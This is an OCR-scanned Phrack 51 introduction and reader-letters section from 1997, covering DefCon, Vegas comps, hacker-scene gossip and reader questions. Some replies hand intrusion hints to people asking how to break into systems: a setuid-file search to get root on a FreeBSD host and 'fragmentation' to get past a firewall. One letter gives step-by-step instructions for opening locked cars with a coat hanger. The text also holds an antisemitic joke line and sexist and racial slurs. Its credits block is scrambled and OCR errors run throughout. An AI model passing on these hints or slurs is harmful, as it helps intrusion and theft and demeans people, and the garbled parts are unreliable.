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[ Registered Hex Offenders 


DefCon. I love DefCon. Why do I love DefCon? Several reasons. I get to 
see many people I do not normally get to hang out with. And it’s in Las Vegas. 
Ok, I guess that’s two reasons. I love DefCon for two reasons. 


Las Vegas is a blast. No two ways about it. Free drinks _while_ you get 
FREE money. What more can anymore ask for?!@ Sex? Gluttony? Corruption? 
Greed? Thin facades? Tackiness? Friends, it’s _all_ there. 


rE 


Vegas is certainly not for everyone. It’s not for the timid, the shy or 
the compulsive. Vegas can and will eat you alive, if you are not careful. 
Even the most vigilant often find themselves victimized by Sin City... As I 
write this paragraph, my memory draws me back... back to that first week in 
July 1997, towards the end of DefCon V, when a good friend and seasoned Vegas 
adventurer came knocking on my door at half past 5am... 


He was armed with a coke in one hand, a whiskey in the other. The fact 
that he was noticely unencumbered by money caught my eye. The Casino Demons 
had relieved him of that. He was in need of a safe place to camp for a few 
hours... I happily obliged. I attempted to make his stay with us as 
comfortable as possible... However, my friend refused all attempts at 
hospitality. He was still deep in the throes of what professional Vegas 
travelers call /The Zone’. He was in a dull haze, a casino-atmosphere-induced 
catatonic state, in which external stimuli are, for the most part, ignored. 
There was little I could do for him, so I bedded down... And there he sat, 
engulfed in darkness, deep within his own world... Eventually, exhaustion 
overcame him, and he drifted into an uncomfortable sleep... Early in the 
morning, he arose, determined to retake his reappropriated wealth. 


It took me a few tries of getting raped by that town before I realized how 
it works, and, more importantly, how to work it. 


It can be summed up in one word. An abbreviation even. COMPS. Vegas is 
all about being compensated for. Compensation for being in out in the fucking 
desert. Compensation for staying in some shitty hotel. Compensation for 
winning some of their money. Compensation for losing ALL of your money. 
Learning how to have a good time in Vegas means learning how to get comped. 

In order to be comped, you must either a) be some one important, b) know 
someone important, or the most common occurrence, c) comp other people. 


This past DefCon, I had my room upgraded from a single-bed room on the 
first floor, to a double-bed on the second, and then from that to a $400/nite 
suite somewhere up in the 20’s (you know, the kind with the double doors). 
It’s all about knowing how to work the system. Knowing how to get comped. 
Complaining about something is often a good way to get something for free in 
Vegas. So is being put out in some fashion or another. Go ahead and watch 
Casino and Swingers a few dozen times and you will get the idea... 


A word about this issue. In my opinion, and the opinion of many people 
way cooler then me, this is the Best Phrack Issue Ever (TM). Ok. Now. In 
Issue 48, I know I promised timely dissemination. However, I am an older / 
wiser Phrack editor now, and, what it comes down to, is that timeliness is not 
always possible. Not when there is a minimum level of excellence that must be 
preserved. This issue is a perfect example of that phenomena. We have 
amassed some seriously cool shit this time around. Technical excellence 
abounds here, and if we are a few weeks late, I think it should be well worth 
the wait. We’ve got several ground breaking articles, a great deal of source, 
fully nude photos of Milla Jovovich (not available in ASCII-Phrack) and a new 
format. Commentary, as always, is appreciated. 
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What makes this (or any) issue so damned good? Simple. The incredibl 
array of talented individuals that graciously lend their time to writing 
articles for us. I just want to give a word of thanks to you guys: past, 
present and future. Without you, Phrack would slip quietly into the night... 
This issue, a special werdup to halflife for the technically superior work 
he contributed for P51, thrice over. 


Phrack 51 comes atcha power-packed with new streamlined formatting! We 
cut out colons, added a surplus of dashes and brackets, and bOOm! Less fluff, 
more EDGE. Areodynamicphrack. Europhrack. _Slickphrack_. 


Bad to the bone and shot to the heart when you think about Phrack, you touch 
yourself. 


Enjoy the magazine. It is for and by the hacking community. Period. 
JOY 


PS 


The aforementioned gamblaholic ended up being comped three $20 meals, and a 
show (Lance Burton at the Monte Carlo). Man, that lucky son-of-a-bitch got to 
see Lance at the Carlo... 


—-- Editor in Chief route 

-- Nominal Editors ------------— datastream cowboy, alhambra 
We’ve given up hope -—------- voyager 

-—- Phrack World News disorder 

-- Phrack Webpage Sloth ------- loadammo 

—-- Most Likely To Be Beaten --- 


—- About the Head and Neck by - 


—- Xanax Nicki Jarecki 
Elit > omerta 
Number One Crush -~--------- Milla Jovovich 
—- Extra Special Thanks ------- halflife 
-—-— The Man on The Inside ------ varak 
—- Gas Face Given "Lunatic Unix with Tunics" 
—- Got owned? Shoulda used --- OpenBSD 
—- Shout Outs The Guild, r00t, The Death Vegetable, Swamp 


Ratte, prym, maverick, Cantor, nirva, The 
Army of the Twelve Monkeys, guyver, mycroft, 
Asriel, Theo Deraadt, X, Torquie, mudge. 
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",..Who’s the big winner tonight...? Mikey! Mikey wins! Mikey’s the big 


winner...!" 


-—- Trent "Double Down" 


*jtb* phrack’s like wine, 
*jtb* as opposed to, like, 


",..Daddy needs a new pair of Jews. 
loadammo, 


hand down upon alhambras shoulder, 


Vegas, NV. 


W 


(Vince Vaughn) 


it gets better with age 
decomposing. 


DefCon V, 


Las 


clamping a mighty hand down upon my shoulder and a mighty 
Blackjack Tables, 
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[ PHRACK 51 LiO OP Be ACK. 


a at a [ Phrack Staff 


Ox1> 


Issue 50 proves that Phrack _is_ back, and better than ever. 
Congratulations to you and the rest of the Phrack staff for putting 
together what I think is by far the most informative issue to date. The 
quality of the articles and code (YES! Lots of code!) reflects the hard 
work and commitment that obviously went in to this issue. I could go on, 
but I’m all out of lip balm. 


Thank you! 
—pip_ 


[ Thank you. We aim to please. ] 


Ox2> 
{ ...Bugtragq Phrack 50 announcement deleted... } 

So What? 

Who cares? get this crap off of the mailing list. 


phrack is as much trash as 2600 or any other 
little idiot magazine. 


[ Thank you. We aim to please. ] 


Ox3> 
juggernaut is way cool, man. 


minor bug: you dont unset IFF_PROMISC on exit, so it’s not terribly stealthy, 
but it’s no big deal to fix. 


anyway. cool. 


.techs. 


[ Although Juggernaut is *not* meant to be a ’covert’ program you are 
completely right about that. I should unset promiscuous mode when the 
program exits. In fact, in version 1.2 (patchfile available in this 
issue) I include this very thing. ] 


Ox4> 


Hi! 
I’ve got the p50.tgz and well, played a little with juggernaut. 
It’s realy cool but: 
1) It doesn’t compile so clean. You’ve forgot to #include 
<linux/netdevice.h> before <linux/if_arp.h> 
2) The spy connection part is not quite cool because you 
sniff and dump all the stuff that is comeing from the dest. port 
and dest. host ... 
So if U try 2 spy say: 
193.226.34.223 [4000] 193.226.62.1 [23] 
U spy in fact all the stuff that is comeing from 193.226.62.1 [23] for 
ALL the conn. made to 193.226.62.1 on the 23 (telnet) port. 
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This will cause a cool mess on the screen. 
I’ve tried 2 restrict the spying by introduceing a new cond. 
iphp->daddr==target->saddr in net.c ... it brocked the spy routine 


Maybe U’11 fix somehow that thing.. 


All my best regards, 
Sandu Mihai 


[ <linux/if_arp.h> includes <linux/netdevice.h>. [The compilation of the 
program should go smoothly on any linux 2.0.x based system. Version 1.2 
also fixes the TCP circuit isolation problem you allude to... ] 


Ox5> 
Thanks! 


This is a very impressive tool! Brilliant work! 


Thank you, 


—-Craig 


[ Thank you. ] 


Ox6> 


I’m just writing this to say thanx for putting out such a kickass publication. 
Down here in 514 it’s fuckin dead, you mention hacking and half the people 
don’t have a clue what Unix is.It’s fuckin pathetic, but i’m glad to say 

that your mag has helped a lot and i look forward to future issues, you guys 
really do make a difference in the hacking community. Thanx. 


Snake Eyes 


[ Amen to that. ] 


Why don’t you (at Phrack) compile an updated Pro-Phile on known H/P 

Groups like the one on issue #6 ? 

So w the readers can know something more about the ACTUAL scene 
(but perhaps it’s not worth - ppl’s sick of all that 3133t d00dz ;) 


I really appreciated that dox & srcs on spoofing, D.O.S., etc. 
HIGH technical quality, sources, articles, news.... and it’s free! :P 
Ahh that’s life! ;) 


However, great job with the latest Phrack issues. 
To quote a friend of mine (talking of Phrack Magazine)... 


> It’s improved a lot with Deamon9 in command.... 
K, that’s all. 


**PHRACK RULEZ!** (I had to say that :) 
Oh... and sorry for my english! 


GYa.ees 
-Ax1l- 


[ Not a bad idea. Perhaps someone would like to do an article on 
the existing groups out there for P52? ] 
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Ox8> 


I would like to know what you suggest to get me headed in the right 
direction reguarding the compromise of computers on the internet. 


any information that you would be able to spare would be most appreaciated. 


atomicpunk. 
[ It’s *all* about compromise. It’s something you have to do. Be fair to 
them. Listen to them. Don’t shut them out of your life. They are 
wonderful creatures... It’s a give and take thing and sometimes, yes, you 
*have* to compromise -—- that’s part of having a mature relationship. ] 
Ox9> 


I recently locked into my car so i called a friend to come help me 
when the slim jim was no help he decided to try another less known 
method. 


We simply took a stiff metal coat hanger and straightened it out and 
made a small loop in it then we took a small speaker wire about 3 feet 
long and tied a loop into one end so it would slide to make the loop 
smaller or larger. 


Then you take the wire and run it in through the loop in the hanger 
and pry the top edge of the car door open and slide both looped ends 
through holding onto the unlooped ends. 


hen you use the hanger to position the loop in the speaker wir 
round the door lock once you have the loop into position you hold 
he hanger steady and gradualy pull the loop tight around the lock 
nce the loop is tight you just pull up on the hanger. 


t 
a 
t 
fe) 


This works on most all vehicles with top door locks and with a little 
prep. and practice can be done in under 2 mins. also its less 

conspicious and easier to get than a slim jim. and they are cheap 

so no one care to toss the out after breaking into an entire lot of cars. 


Hope you found this phile worth while 
C’lya 
The Stony Pony 


[ Aspiring young car thieves among us thank you; however if you 
lock yourself in the car again, you might try unlocking the door 
manually. ] 


Oxa> 


HOW YOU KNOW YOUR A TRY HARD HACKER 


By [Xtreme] 


I just wrote this to tell all you try hard hackers something. 


You goto other hacker pages on the web. 

You think loading a program that waz made by a hacker is hacking. 
The only thing you do is get the lastest passwd file from your isp. 
You goto channels like #hack and ask for passwd files. 

You don’t know where to get warez. 

You always telnet to hosts and type 


NOP WNE 


login: root 
password: root 
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and stuff like that. 


7) You brag about how you are a hacker. 

8) You don’t know C. 

9) Your a girl. 

10) You don’t know what’s a shell. 

11) You don’t know what Linux, FreeBSD and all those other UNIX’s are. 

12) You don’t have a UNIX OS. 

13) You think when using IRC war scripts, your hacking. 

14) Asking how to hack other people’s computer. 

15) You try cracking a shadowed passwd file. 

16) You don’t know if a passwd file is shadowed or not. 

17) You ask what is a Tl. 

18) You ask how to email bomb and you think email bombing is a form of hacking. 

19) Your learning BASIC language. 

20) You think you can get into hacking straight away. 

21) You don’t know how to set up an eggdrop bot. 

22) You think .mil stands sites stand for a country. 
[ That is without a doubt, the dumbest thing I have ever read in my life. 
Not only do I award you no points, but we are all now dumber having read 
that. May God have mercy on your soul. ] 

Oxb> 


What command do I use to make you denial of service package work? 


[ You hit yourself in the head with a hammer. ] 


Oxc> 
I was scanning the 413 xxx 99XX range and I found some #’s. I have 
no idea what they do. I was wondering if you could help me out. 


Maybe call them and see what you find or someting. 


(413) xxx-99xx 
(413) xxx-99xx 
(413) xxx-99xx These are all fax #s, I think 
(413) xxx-99xx 
(413) xxx-99xx goes beep beep beep 
(413) xxx-99xx goes beeeep 
(413) xxx-99xx auto foward I think 
(413) xxx-99xx goes b pb p 
[ I tried calling these but I got no answer. Maybe the ’X’ on my phone 
is case sensitive? ] 
Oxd> 
Sir, 


I would like to know how could I get root permission from a simple user. 

I have read that this can be accomplished by setuid programs, and I have read 
an article describing the way this can be done in Phrack Magazine. Still I 
couldn’t gain root access. I would be very interested in finding ways of doing 
this on Irix 5.2 or Solaris 2.5. If you know anything about this, please 

send me an e-mail. If you know any resources on the Web that details the use 
of setuid programs in order to get root access, please tell me. 


[ P49-14 ] 
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Oxe> 
>AND FOR THE LOVE OF GOD, SOMEONE NOTIFY MITCH KABAY...!< 
Mich, not Mitch. "Mich" is short for "Michel." 


M. E. Kabay, PhD, CISSP (Kirkland, QC) 

Director of Education 

National Computer Security Association (Carlisle, PA) 
http://www.ncsa.com 


[ No, Mike is short for Michael. ] 


Oxf> 


Your zine is the best 
Please send it to Psycho All@aol.com 


The Psychotic Monk 


PS:Aohell rulez 


[ You are an idiot. ] 


Ox10> 
Hi, Phrack people! 


Great job on issue 50! Nice magazine. Article ‘’bout TTY hijacking is really 
superb. 


I have just one question to you. Is there any holes on target system in this 
situation? There’s a server, running freeBSD 2.1.5, with a shadowed passwords. 
I’ve got a dial-up account on that machine as a simple user. What bugs can I 
use for having root privileges? 


Best wishes from Ukraine!! OmegA 


[ find / -perm -4000 -print ] 


Ox11> 

hello... long-time reader, first-time writer: 
i know that all "submissions" are to be encrypted... and i should be 
encrypting anyways, but i’11l make it quick ... besides, this isn’t 


really a "submission..." 
y 


congrats on reaching the 50th issue mark, and congrats on an 
excellent ish! 


i just a quick question. i would like to reprint the <soapbox> 
for issue #50 on my web page, with a hypertext link to the 
Official Phrack Homepage (http://www.fc.net/phrack/ - correct?). 
I think it says brings up some important points, and since it’s 
copywrited, and you sren’t losers, i’d ask you (it’s not like a 
simple copywrite has stopped anyone before)! 


thanks, 
lenny 


[ A simple copyright may not stop people, but the simple restitution 
remanded by courts might. However, go ahead and put a hypertext link. 
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Ox12> 
In Volume Four, Issue Forty-One, File 3 of 13, Supernigger was featured 
in your Phrack Pro-Phile. Whatever happened to him? Did he "grow up and 


get a real job" or is he still lurking around? 


= SE yxs 


[b-Bothe : 


0x13> 


People @ Phrack: 


In Phrack #50 in the file ’Linenoize’ Khelbin wrote an article about remote 
BBS hacking, namely using Renegade’s default ’PKUNZIP -do’ command overwrite 
the userbase with your own 


For some strange reason, while renegade is booted, and if it runs PKUNZIP -do 
the procedure will NOT work... but the procedure DOES work when Renegade is 
down at the Dos Prompt..? 


Does Renegad xtract files into memory or something while testing for 
integrity? -8) .. I tried this out on 10-04, 5-11 and even 
04-whatever-the-fuck-that-—version-was and it didn’t work.. I think Khelbin 
needs help for his chronic crack addiction since I can’t find any way possible 
to get his article to work.. 


op: Taos BBS 


Telegard v3.02 


We dunno. Anyone else have an answer? |] 


Ox14> 
Regarding Xarthons submission about Linux IP_MASQ in Phrack 50... 


The masquerading code is not designed for security. Hardwiring RFC1918 
addresses into the IP_MASQ code is not a clever idea for two reasons: 


1) It diminishes the usefulness of the code. I have used masquerading to 
keep things running when my company changed internet providers. I 
masqueraded our old _valid_ IP range. Other people may come up with 
other valid uses, like providing redundancy through two ISPs. 

2) The masquerading code is part of the Linux packet filter, which can 
certainly be configured to prevent spoofing, a quite a bit more. 


If the static packet filter and the masquerading code are used together 
they can provide as much security as a ’dynamic’ filtering firewall like 
Firewall-1l in many cases. A very short ’HOW-TO’: 


1) Put spoofing filters on all interfaces. Only allow incoming packets 

to the external interface if the destination address is that of the 
external interface (that’s the address the masquerading code inserts as the 
source address of outgoing packets). 


2) Insert rule(s) in the forwarding filter to masquerade your outgoing 
packets. You do not need to route incoming replies to masqueraded 
packets, that happens auto-magically. Deny everything else (and _log_). 


3) Make sure the gateway does not run anything that leaves you 
vulnerable. Don’t run NFS, the portmapper etc. Update sendmail, bind to 
the latest versions if you run them. 
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4) Disable telnet, and use ’ssh’ for maintenance. If you must support 
incoming telnet connections through the firewall install the TIS firewall 
toolkit, and use one-time passwords. 


5) Run ’COPS’, ‘’Tripwire’. 


6) Read a good book about Internet security, and make sure you 
understand all the issues involved before you configure _any_ firewall, 
even one with a GUI and a drool-proof manual. 


I hope this is useful to some people. 
Ge’ Weijers (speaking for myself only) 


Ox15> 


You write in P49-06: 


The only sure way to destroy this 
channel is to deny ALL ICMP_ECHO traffic into your network. 


No. It suffices to clear the content of the packets 
when passing the firewall. 


ralf 


[ True enough. However, by doing this you remove the RTT info from 
the ICMP echos which will break some implementations which rely on it. 


Ox16> 


Hi, Im a Wannabe, maybe you would call me and idiot. 
Where do you guys hang out, IRC? Wich channel, #supreme? Wich server? 
Know any good trix for me how to learn more about hacking? 


Please answer my letter, I know that you get lots of letters, but 
please!! 


[ EFNet, #phrack ] 


Ox17> 


You cant realy say that IRC is for loosers cuz in Phrack 50 I saw an 
article with some text taken from IRC, and you were logged in. 


[ We are losers. Ergo, yes we can. ] 
Which good hack books, UNIX books or things like that do you recommend. 
Thank You For An Answer!! 

[ Anything Addison Wesley or ORA. Also, many of the PTR/PH books. ] 


O0x18> 


I am writing to inquire about the fate of Pirate Magazine 

and how I might contact it’s creators. It seems to have been out of 
circulation since 1990 and I was hoping to look at possibly organizing 
some kind of initiative to revive this excellent publication. I thought 
first to turn to Phrack magazine. Thanx for your time. 


Joong Gun 
[ Anyone have any information? ] 


Ox19> 
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Hello, 


I just got Phrack 50 and loved it....It is the first one I’ve 
got. I was wondering if you guys know about any other newsletters or 
magazines that are sent to your e-mail address or you can get off the web on 
a regular basis, like Phrack. thanx 


[ Other magazines come and go on a pretty regular basis. Phrack is 
eternal. Phrack is all you need. ] 


Oxla> 


Please help me. If I can’t join your club, please let me learn from you. I 
am interested in both Program hacking and remote access. 


Thanks. 
quattro 
[ You join our club if you can find our secret clubhouse. ] 


Oxlb> 


hi. This is from a guy you probably will never hear of again, and 
definantly have never heard of already. I wanna ask you a question. At 
my school, people write crap on their backpacks with witeout. I have 
never done this for 2 reasons 


1) I dont wanna be grouped with the poseur metalheads, etc who write 
"Pantera" and "666" and "Satan" etc but cannot name a song of thiers, 
and/or go to church.... 


2) I dont wanna be grouped with the wanna be hackers who write stuff 
like Anarchy symbols, "Aohell" "Kaboom" and the such, because thats just 
plain lame. You have to feel sorry for people who think they are elite 
because they can mailbomb somebody. 


Another reason I have never written anything is I havent found anything 
worht advertising. Now i have, I wanna write "The guild" or something to 
that extennt maybe "r00t" or something. I have not done this for i do 
not want to piss you off (indirectly something may get to you about it. 
It could happen, remember the 6 degrees of seperation? hehehe). If this 


is ok with you, lemme know please. (cad@traveller.com) Also, if your 
wondering why im mailing this to you alone, it is because you are a 
fucking baddass. heh. Well, lemme know whenever ok? thanks. 


(I know i have an absence of punctuation, i’m in a hurry and I have 
homework) 


[ You have our permission to write r00t on your backpack. ] 


Oxlc> 


yes i want to learn how to hack and need to learn fast 
Js444 told me you can help 

will repay BIG 

thanks 


[ How big? ] 


Oxld> 


I sent this from your hoime page...is it X-UIDL? I dunno, it’s 4 AM 
anyway 
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um oh, keep in mind that ur response (if made) to this may be dumped to 
#hack printed in the next Citadel knockoff or whatevrr 


I was just like thinking oh, I was thinking "I don’t have an Irix 
sniffer!"...actually my thoughts don’t have quotes around them it was 
more like 


o- all the Irix sniffers I have suck -o7 


and then theres like Irix 4, 5, 6. Bah. And like sniffit sucks and 
anyway. And then I mentioned this and people were making fun of me, but 
I don’t care. I only care lately when people are like, "Oh that’s what 
youy make? I’m 17, have a criminal record and make three times that!". 
Anyway, people are like, "No, no nirva is elite" so I thought, aha, I’1l 
ask nirva what a good Irix sniffer is. Oh, like now that people are 
laughing at that I have to keep this quets like secrtet. I even think 
some Irix’s don’t have compile, like Solaris. Christ, some Solaris’s 
have jack shit. Anyway. 


1) Why don’t u log on #hack, or are you tres elite #!guild or beyond 
elite #www or #root #Twilight_Zone and more importantly 


2) Irix sniffer - captures passwords, actually compiles. I hate 
coding. I amaa lazy American. And like, getting legit root access on 
an Irix...bvah, Irix sniffer! 


Bye-bye hackers 
oh PostScript 


3) Are you a cyberpunk? 


If I ran Phrack I wouldn’t like Mr. Tishler have "Are hackers in general 
geeks?" as the question _everyone_ gets, I think, Are you a cyberpunk? 
Would be it 


[ 1. We do hang out on as many public channels as we can stand for 
at least a little bit of time each issue. But really why do 
you care if an editor of Phrack is there when people are shouting 


about their penis size and how many drugs they are on? If you 
want to talk about something, we are always available by e-mail 
and will usually talk to you by private msgs if we aren’t busy 
doing something else at the moment. 

2. Anyone want to write us a really cool one? 

3. Who are we to change tradition? ] 


Oxle> 

Hello, 

I wanna ask you something about the following problem. I’m really stuck (the 
lst time ;-)) ! Is it possible to pass a firewall and access one of the 
domains behind it ?? I’m afraid that the sysadmins did their job fine : ( 

I’ve got everything what I need but that damn wall....I’1l give you some info 


that I’ve obtained so far: 


— IP-address of the firewall, 

- All the domains + IP adresses behind this wall, 

— The login-account of the superuser, 

—- All the open-UNIX ports behind the wall, 

— The company has no WWW-site but they do have an Intranet. 


portscanning gives me this: 
21~*=ftp; 
237=telnet, 

257° =smtp-mail 220 x.x.x.x SMTP/smap Ready. 
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This is at IP x.x.x.2 but I found out that also x.x.x.1 belongs to the same 
company with 3 other ports... 


7~=echo, 
9~=discard-sink null 
79°=finger. 


Is the only way to go by D.O.S. attack the firewall and then spoof the 
firewall’s IP addres ? 


But how to start ?? Woul u be so kind to help me ?? 
TIA, 
theGIZMo 


[ fragmentation. ] 


Oxlf> 


Ok, this might sound dumb , but, I think it would be cool to have this as a 
slogan. 


"Blah, blah, blah, and along with your subscription, you’ll receive a 
LIFETIME WARRANTY ON YOUR BRAIN!! That is, if for any reason your brain 
can’t figure out a problem you’re having hacking, just e-mail us with your 
question and we’ll be glad to help you out. Note: Please PGP encrypt all 
questions regarding hacking questions. Thank you." 


Do you like it? Note that blah, blah, blah is whatever you would it to be. 
Such as, "You can subscribe to Phrack Magazine by sending e-mail to 

Phrackedit@infonexus.com requesting you be put on the list, and along with 
your subscription...... 


Ok, thats it....write back if you like it....or if you don’t. Here is my PGP 
public key. 
Oh yeah...you might have gotten mail from PhatTode@aol.com. That is me. So 
direct replies to those messages to this new address...Thank you. 

[ You’re right. It does sound dumb. ] 
Ox20> 
Hey, 


sorry to bother you but I just got Redhat Linux 4.1 in the mail. I 
think it’s great besides the fact that I hear that it lacks security. 
HOw do I get PGP up in it? Is it easy to install? Thanks. 


Killer Bee 


[ yes, very easy to install. Read the documentation. It’s different 
for different platforms. ] 


Ox21> 


Hello 

My name is Joseph and I am intrested in any information you may have 
about the early day’s of hacking and current hacking underground.. also 
I understand you are a member of the guild ?? what is this? 


Joseph --> jgriffiths@iname.com 


[ The guild is like what r00t was before r00t got all famous and became 
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greatly feared and admired. Oh. And we spend most of our time counting 
our millions and having sex with models. ] 


Ox22> 


Hi there, 


Do you know where I can find the Rosetta stone for interpreting the output 

of Solaris lockd & statd in debug mode? I can’t find any public information 
about it, even on Sun sites. Sun Microsystem refuses to let their lab 
publish anything about interpretation of system calls outputs. Are they 
afraid that they will be losing support contracts if this information gets 
out? The man page does not include arguments to run in debug mode, and 
what’s the point of providing the tools w/o the means to interpret the 
result? Teach a man how to fish ..... you know. 


Thanks. 
Christine 
[ Someone want to write an article on it? ] 


0x23> 


In regards to the article on Ethernet spoofing: 
As an aside note for the highly paranoid: ethernet spoofing 


Note: some of this is theorized, and might not be 100% accurate - if you 
get the jist of it, you should be able to figure out if it works for 
you. 


It is possible to spoof ethernet hardware addresses as well. Some cards 
will allow you to do this easily, but you need to have card programming 
docs (check the Linux kernel source for your card driver-!!). Others 
won’t let you do it at all, and require a ROM change, or worse it might 
be solid state logic on the card - EVIL. Course you might be able to 
get around solid state stuff by recoding the ROM, but I wouldn’t 
recommend it unless you don’t have the $70 to buy a new card, and have a 
month or two to spend in the basement. 


rest of stuff(tm) deleted 


Interestingly enough, most of the Sun sparc stations I’ve seen allow you to 
enter in any mac address that you want using ifconfig(1M). I "know someone" 
who picked up a Sparc IPC for $50 (Can $$) and upon discovering that the 
battery that powers the IDPROM was deceased, we needed to fake a mac address 
to get it to talk to someone. Sun’s default is 0:0:0:0:0:0 but the 3Com 
card’s mac (from a different network) worked quite nicely. 


Interesting concept the author has though, I’11l be f*ck around with the idea 
when I’m supposedly doing work =) 


[ MAC address spoofing techniques are well known about, especially under 
Sparcs. However, do some research, write some code and an article and 
submit it... ] 


O0x24> 


I love your e-zine it is the coolest thing i’ve read. 
[ Thank you. It’s the coolest thing we’ve written. ] 


Please could you tell me any ways to violate the security of a "MacAdmin" 
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based system on the Apple Macintosh. 


[ What’s a Macintosh? ] 


Mark "Vombat" Brown 


May phrack and Fiona live forever! 


0x25> 


[ ...and may Phrack and Fiona do a joint project some time soon... ] 


Hey, I sent this to you because yer handle is shorter. 


Anyways, great job on issue 50, always a pleasure to read it, and 

in article 12, by Sideshow Bob, I was wondering about the "tail" 

command. I don’t seem to have this nifty util, and was wondering 

if perchance, you knew where I could get a copy. Also: the Skytel 

article sorta looked like an advertisement to me. Nothing against that, it’s 
still pretty interesting to learn of Skytel’s history, and of the nifty things 
out there, but I was wondering if it sounded like a detailed ad to anyone else. 
But if you could help me out with the tail command, I’d be so grateful. 


Ox26> 


Ox27> 


Joel Thomas 


[ Standard GNU utility. Try your local unix box. ] 


G’ day mate, 

I am a computer user in Camplong, Timor. I have limited internet access, as 
it is a long distance phone call from home. I have downloaded your issues 
46-50 and haven’t read through them all yet, but what I see looks good. 

What I need from you is a UUENCODER program so I can extract the included 
files. 


[ Standard GNU shell tool. Any Unix host will have it. Do a websearch 
to get it for Windows.  ] 


I am also confused on how to extract the .c files from the text 
files (philes?). 


[ As it says in the header file: gcc -o extract extract.c 


then ‘extract filename’ ] 
I am not a C programmer, but my dad is. 

[ “That’.s- nice. J 
I need PGP. Although my side of the internet is safe, noone reading others 
letters (the sysop is too dumb or something to even think about that) I want 


my mail to get where it is going in one piece unread. Where can I find a 
free copy of PGP? 


[ Do a websearch. ] 


crack me up. Excellent social porno in your reader’s letters section. 


Keep on commenting. Might start screaming soon. 
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Um, the guy from slovakia might want to get hold of Bill Squire for 
information on smartcard programmers; as I seem to recall, he likes 
messing with these electronic devices. 


Another thing; I though DC was now just sticking to his viola? According 
to all the news he only started hacking because someone vandalized it? 
Wonder if I should have used the same thing in my case: "I plead not 
guilty, Magistrate sir, but the University’s good-for-nothing courses 
drove me to it." Whatever it takes, I guess.. 


Yum. 


—me. 


O0x28> 


This is a response to p48-02 in which one "Mr. Sandman" proceeded to spew 
out eleven paragraphs of blatant misinformation. Rather than lumbering 

through a point-by-point rebuttal to his letter, I will quickly summarize 
what was wrong with it, and then state a few facts to clarify some things. 


KoV never touched Skidmore. This is something that anyone who was in the 
group will attest to. And not just to follow the old "admit nothing, deny 
everything" plan. In reality, we NEVER touched it. 


In retrospect, I find it very odd that someone from New York would claim 
to know so much about the inner workings of a decidedly regional 
[Connecticut] hacker collective. While we weren’t exactly xenophobic, we 
certainly didn’t go out of our way to divulge information about ourselves 
to anyone outside the group (or the state, for that matter). This would 
explain why Mr. Sandman’s letter was riddled with insufferably laughable 
lies that were obviously the product of a jealous and dejected outsider. 


One thing that needs to be put to rest is that we were certainly not "a 
bunch of egotistical and immature criminals" as Mr. Sandman would have you 
believe. The primary focus of KoV’s efforts was not to "break into 
universities" or "make ourselves look bigger and more important than we 
were." W xisted, first and foremost, to unify what was, at that time, a 
greatly divided scene. Squabbling and infighting among those few real 
hackers who were still around was leading to a critical breakdown at the 
fundamental level. Something had to be done, and fast. In an effort to 
bring together a group of like-minded individuals (not only from the 
hacker perspective but also in terms of anarcho-libertarian philosophy and 
ideology), I started KoV with an intentionally humorous name behind the 
acronym. It was an almost immediate success, and over time I certainly 
accomplished all that I’d set out to do, and then some. 


The current state of the "Connecticut hacker scene" (for lack of better 
terminology) is much different than it was in the summer of 1994. People 
are working together, cooperating, and the incessant "civil wars" which 
plagued us back then are all but nonexistent today. I think I’d be well 
within my rights to credit KoV with helping to assure that those problems 
are now but a memory. It really bothers me when anonymous instigators like 
Mr. Sandman attempt to dishonor all the work that we did to get this far, 
without even really having a clue as to what we were (and are) all about. 
Perhaps he and his ilk could benefit from such groups as KoV. Because no 
matter how I feel about him and his actions... 


"The more we fight among ourselves, 
the less of a threat we are to the system." 


—- Valgamon 
Sat Jun 07 15:49:25 EDT 1997 
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What up. 
Yo, Ima hack/phreak from back in the day (1984) 
My lst bbs was on an atari with a floppy drive and 64k! 


Nowadays, I do rap music and acting, live in Los angeles (im from western NY), 
and run 900#s and adult websites. 


Check this out, I need to thangs: 


1: FTP space for adult pix (not really important, since my host gives me 
unlimited space), but I have no anonymous ftp capabilities) 


2: Windows NT or unix 

Can you help?? 

Have broom (Music software) will travel (trade) 

[ We will trade you unix for a rap song about Phrack and a movie role 
for route. ] 


Ox2a> 


This is in reference to the first part of your " PGP Attack FAQ," which 
addresses the length of time necessary to brute force IDEA. Perhaps I’m 
overly paranoid (naw...) or just a perfectionist, but I would like to 
point out two things about this: 


1) Somewhat of an error in your math? 
2) “As far as present technology is concerned." 


"As we all know the keyspace of IDEA is 128-bits. In base 10 notation 
that is: 


340,282, 366, 920, 938, 463, 463, 374, 607, 431, 768,211,456. 


To recover a particular key, one must, on average, search half the 
keyspace. That is 127 bits: 


170,141,183, 460, 469, 231,731, 687, 303715, 884,105,728. 


If you had 1,000,000,000 machines that could try 1,000,000,000 keys/sec, 
it would still take all these machines longer than the universe as w 
know it has existed and then some, to find the key. IDEA, as far as 
present technology is concerned, is not vulnerable to brute-force 
attack, pure and simple. " 


Somewhat of an error in your math 


OK, let’s examine the math. For simplicity, let’s say we only had one 
machine that could try 1,000,000,000 keys/sec. The number of seconds it 
would take for this machine to search half the keyspace, and thus find 
the correct key would be 

170,141,183, 460, 469,231,731, 687, 303715, 884,105,728 divided by 
1,000,000,000. This would yield 170,141,183, 460,000,000,000,000,000,000 
seconds of maximum search time before finding the key. This in turn 
would be 2,835,686, 391,010,000,000,000,000,000 minutes = 

47,261,439, 850,100,000,000,000,000 hours = 

1,969,226, 660,420,000,000,000,000 days = 5,395,141,535, 400,000,000, 000 
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years = approximately 5.395 sextillion years. If there are 1,000,000,000 
of these machines as you suggest, then the years required for a 
successful brute force crack would be 5,395,141,535,400,000,000,000 / 
1,000,000,000 = 5,395,141.5354. So, it comes down to: are you saying 
that these 1,000,000,000 machines are acting as a collective entity or 
can *each* one of these machines operate on 1,000,000,000 keys/sec and 
thus operate together at a speed of (1,000,000,000) * (1,000,000,000) = 
1,000,000,000,000,000,000 keys/sec. If the first is true, then you are 
correct in saying that "it would still take all these machines longer 
than the universe as we know it has existed and then some," as it would 
take app. 5.395 sextillion years (scientists estimnate that universal 
redshift shows the universe to have existed thus far for only 15 billion 
years). If the second is true, then it would take far less time than the 
existence of the universe at app. 5.395 million years... which could be 
compared to twice the amount of time human beings hav xisted on earth, 
or just a fraction of the time dinosaurs were here. 


[ Hrm. Take it up with Schneier. ] 


"As far as present technology is concerned." 


How far is present technology concerned?! The Intel/Sandia Teraflops 
Supercomputer can reportedly perform 1.06 trillion floating point 
operations per second (refer to 
http://www.intel.com/pressroom/archive/releases/cn121796.htm). Assuming 


[ Keep in mind that factoring and brute force key searches ar 
